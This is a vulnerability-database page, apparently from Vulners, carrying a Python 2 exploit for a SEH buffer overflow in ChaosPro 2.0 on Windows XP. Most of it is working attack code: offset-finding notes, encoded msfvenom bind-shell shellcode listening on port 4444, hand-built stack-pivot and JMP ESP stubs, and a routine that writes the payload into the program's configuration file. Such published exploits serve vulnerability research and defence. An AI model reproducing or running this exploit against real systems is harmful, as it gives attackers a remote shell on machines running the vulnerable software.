Vulners
Lucene search
ChaosPro 2.0 - Buffer Overflow (SEH)
# Exploit Title: ChaosPro 2.0 - Buffer Overflow (SEH)
# Date: 2019-10-27
# Exploit Author: Chase Hatch (SYANiDE)
# Vendor Homepage: http://www.chaospro.de/
# Software link: http://www.chaospro.de/cpro20.zip
# Version: 2.0
# Tested on: Windows XP Pro OEM
#!/usr/bin/env python2
import os, sys
# sploit = "A"* 5000 ## Crash! 41414141 in SEH! via ProfilePath or PicturePath. Windows XP OEM
# `locate pattern_create.rb | head -n 1` 5000 # 326d4431
# `locate pattern_offset.rb | head -n 1` 326d4431 5000 # 2705
# sploit = "A" * (2705 - 4 - 126) # 2575
# sploit = (pattern_create) # `locate pattern_create.rb|head -n 1` 2575 # 0012F51C dump is 61354161, or 61413561 in LE
# `locate pattern_offset.rb|head -n 1` 61413561 2575
# 16
################ Second stage ####################
sploit = "A"*16
# msfvenom -p windows/shell_bind_tcp LPORT=4444 EXITFUNC=seh
#, BufferRegister=ESP -b "\x00" -e x86/alpha_mixed -i 1 -f c
sploit += (
"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
"\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x6b\x58\x6e\x62\x77\x70"
"\x75\x50\x57\x70\x71\x70\x6c\x49\x68\x65\x44\x71\x4b\x70\x50"
"\x64\x4e\x6b\x52\x70\x36\x50\x4c\x4b\x36\x32\x66\x6c\x4e\x6b"
"\x62\x72\x54\x54\x6e\x6b\x72\x52\x34\x68\x54\x4f\x6d\x67\x50"
"\x4a\x31\x36\x30\x31\x6b\x4f\x6c\x6c\x55\x6c\x71\x71\x31\x6c"
"\x53\x32\x76\x4c\x67\x50\x7a\x61\x48\x4f\x56\x6d\x33\x31\x6b"
"\x77\x58\x62\x4a\x52\x61\x42\x56\x37\x6e\x6b\x52\x72\x52\x30"
"\x4c\x4b\x71\x5a\x37\x4c\x4e\x6b\x32\x6c\x52\x31\x50\x78\x4b"
"\x53\x37\x38\x75\x51\x68\x51\x62\x71\x4c\x4b\x46\x39\x45\x70"
"\x53\x31\x68\x53\x4c\x4b\x51\x59\x64\x58\x4b\x53\x64\x7a\x63"
"\x79\x6c\x4b\x34\x74\x4c\x4b\x33\x31\x6b\x66\x36\x51\x49\x6f"
"\x6c\x6c\x7a\x61\x58\x4f\x64\x4d\x67\x71\x68\x47\x70\x38\x4b"
"\x50\x64\x35\x68\x76\x54\x43\x43\x4d\x58\x78\x67\x4b\x33\x4d"
"\x56\x44\x72\x55\x79\x74\x43\x68\x4c\x4b\x50\x58\x46\x44\x77"
"\x71\x58\x53\x65\x36\x4e\x6b\x44\x4c\x62\x6b\x4c\x4b\x32\x78"
"\x45\x4c\x33\x31\x6a\x73\x6c\x4b\x53\x34\x6e\x6b\x46\x61\x7a"
"\x70\x4b\x39\x72\x64\x57\x54\x61\x34\x51\x4b\x51\x4b\x35\x31"
"\x31\x49\x71\x4a\x32\x71\x69\x6f\x69\x70\x73\x6f\x61\x4f\x52"
"\x7a\x4c\x4b\x65\x42\x4a\x4b\x6e\x6d\x53\x6d\x65\x38\x75\x63"
"\x35\x62\x67\x70\x45\x50\x51\x78\x70\x77\x71\x63\x55\x62\x43"
"\x6f\x31\x44\x45\x38\x52\x6c\x43\x47\x65\x76\x43\x37\x49\x6f"
"\x58\x55\x68\x38\x6c\x50\x43\x31\x67\x70\x73\x30\x55\x79\x6f"
"\x34\x53\x64\x66\x30\x61\x78\x37\x59\x6b\x30\x52\x4b\x73\x30"
"\x49\x6f\x39\x45\x52\x4a\x53\x38\x51\x49\x46\x30\x39\x72\x49"
"\x6d\x67\x30\x42\x70\x71\x50\x66\x30\x63\x58\x48\x6a\x44\x4f"
"\x39\x4f\x59\x70\x4b\x4f\x4b\x65\x4e\x77\x51\x78\x37\x72\x73"
"\x30\x47\x61\x43\x6c\x6c\x49\x38\x66\x72\x4a\x76\x70\x52\x76"
"\x42\x77\x33\x58\x4b\x72\x69\x4b\x47\x47\x35\x37\x69\x6f\x5a"
"\x75\x63\x67\x31\x78\x6f\x47\x59\x79\x50\x38\x79\x6f\x59\x6f"
"\x6e\x35\x71\x47\x42\x48\x50\x74\x68\x6c\x47\x4b\x39\x71\x6b"
"\x4f\x49\x45\x73\x67\x4e\x77\x31\x78\x50\x75\x72\x4e\x62\x6d"
"\x61\x71\x49\x6f\x58\x55\x65\x38\x51\x73\x70\x6d\x33\x54\x47"
"\x70\x6b\x39\x7a\x43\x73\x67\x72\x77\x53\x67\x45\x61\x6a\x56"
"\x30\x6a\x32\x32\x46\x39\x51\x46\x6d\x32\x4b\x4d\x62\x46\x58"
"\x47\x61\x54\x47\x54\x57\x4c\x36\x61\x53\x31\x6c\x4d\x50\x44"
"\x44\x64\x56\x70\x69\x56\x57\x70\x53\x74\x71\x44\x62\x70\x42"
"\x76\x51\x46\x76\x36\x77\x36\x56\x36\x42\x6e\x36\x36\x50\x56"
"\x30\x53\x42\x76\x42\x48\x42\x59\x58\x4c\x37\x4f\x4b\x36\x69"
"\x6f\x59\x45\x4b\x39\x6b\x50\x42\x6e\x62\x76\x47\x36\x59\x6f"
"\x54\x70\x62\x48\x56\x68\x6d\x57\x65\x4d\x31\x70\x59\x6f\x7a"
"\x75\x6d\x6b\x49\x6e\x66\x6e\x75\x62\x39\x7a\x71\x78\x6e\x46"
"\x4a\x35\x4d\x6d\x6d\x4d\x79\x6f\x38\x55\x65\x6c\x57\x76\x31"
"\x6c\x47\x7a\x4d\x50\x79\x6b\x59\x70\x52\x55\x63\x35\x6f\x4b"
"\x31\x57\x37\x63\x44\x32\x42\x4f\x70\x6a\x35\x50\x51\x43\x69"
"\x6f\x39\x45\x41\x41"
) # 710 bytes
sploit += "A" * (2575 - 16 - 710)
################ First stage ####################
# ESP: 0012E75C
# ESP target: 0012FF98
## Need to align to four-byte and 16-byte boundaries:
# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012E75C) /16" |bc
# 282.0000
# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012E75C) /4" |bc
# 1551.0000
# echo "ibase=16; obase=10; 0012FF98 - 0012E75C" |bc
# 183C
# 0012FF32 54 PUSH ESP
# 0012FF33 58 POP EAX
# 0012FF34 66:05 3C18 ADD AX,183C
# 0012FF38 50 PUSH EAX
# 0012FF39 5C POP ESP
sploit += "\x54\x58\x66\x05\x3c\x18\x50\x5c" # 8
# target instruction to push onto stack at new ESP: FFE4 JMP ESP # 4141E4FF
# ./calc_target2.py 4141E4FF 0 7f7f017f 0101017f 3e3e1803
# 0: 25 28 28 28 28 and eax,0x28282828
# 5: 25 47 47 47 47 and eax,0x47474747
# a: 2d 7f 01 7f 7f sub eax,0x7f7f017f
# f: 2d 7f 01 01 01 sub eax,0x101017f
# 14: 2d 03 18 3e 3e sub eax,0x3e3e1803
# 19: 50 push eax
sploit += (
"\x25\x28\x28\x28\x28"
"\x25\x47\x47\x47\x47"
"\x2d\x7f\x01\x7f\x7f"
"\x2d\x7f\x01\x01\x01"
"\x2d\x03\x18\x3e\x3e"
"\x50"
) # 26 bytes
## Realign new ESP with beginning of overflow buffer:
## New ESP should be four-byte and 16-byte aligned:
# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012F51C) / 16" |bc
# 122.0000
# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012F51C) / 4" |bc
# 671.0000
# echo "ibase=16; obase=10;0012FF98 - 0012F51C" |bc
# A7C
## Need to adjust ESP down the stack past the JMP ESP, so push/pop ahead of the JMP ESP we're trying to sled into (keep the sled clean)
# 0012FF54 44 INC ESP
# 0012FF55 44 INC ESP
# 0012FF56 44 INC ESP
# 0012FF57 44 INC ESP
# 0012FF58 44 INC ESP
# 0012FF59 44 INC ESP
# 0012FF5A 44 INC ESP
# 0012FF5B 44 INC ESP
sploit += "\x44\x44\x44\x44\x44\x44\x44\x44" # 8
## Going to have to carve out the address 0012F51C
# ./calc_target2.py 0012F51C 0 7f7f017f 61010101 1f6d0864
# 0: 25 02 02 02 02 and eax,0x2020202
# 5: 25 51 51 51 51 and eax,0x51515151
# a: 2d 7f 01 7f 7f sub eax,0x7f7f017f
# f: 2d 01 01 01 61 sub eax,0x61010101
# 14: 2d 64 08 6d 1f sub eax,0x1f6d0864
# 19: 50 push eax
sploit +=(
"\x25\x02\x02\x02\x02"
"\x25\x51\x51\x51\x51"
"\x2d\x7f\x01\x7f\x7f"
"\x2d\x01\x01\x01\x61"
"\x2d\x64\x08\x6d\x1f"
"\x50"
) # 26 bytes
## Finally, set ESP for the alpha_mixed BufferRegister + JMP ESP
# 5C POP ESP
sploit += "\x5c" # 1
sploit += "A" * (126 - 8 - 26 - 8 - 26 - 1)
################ RET from SEH: JMP SHORT - 126 ####################
sploit += "\xeb\x80" + "\x41\x41" # 4
# 00401B44 |. 5F POP EDI
# 00401B45 |> 5E POP ESI
# 00401B46 \. C3 RETN
sploit += "\x44\x1b\x40\x00"
################ build the config ####################
## Running from just outside base directory of ChaosPro:
def ret_cfg(inp):
# do it live in PicturePath
cfg = """PicturePath %s""" % inp
with open("chaospro\\ChaosPro.cfg",'w') as F:
F.write(cfg)
F.close()
ret_cfg(sploit)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Oct 2019 00:00Current
7.4High risk
Vulners AI Score7.4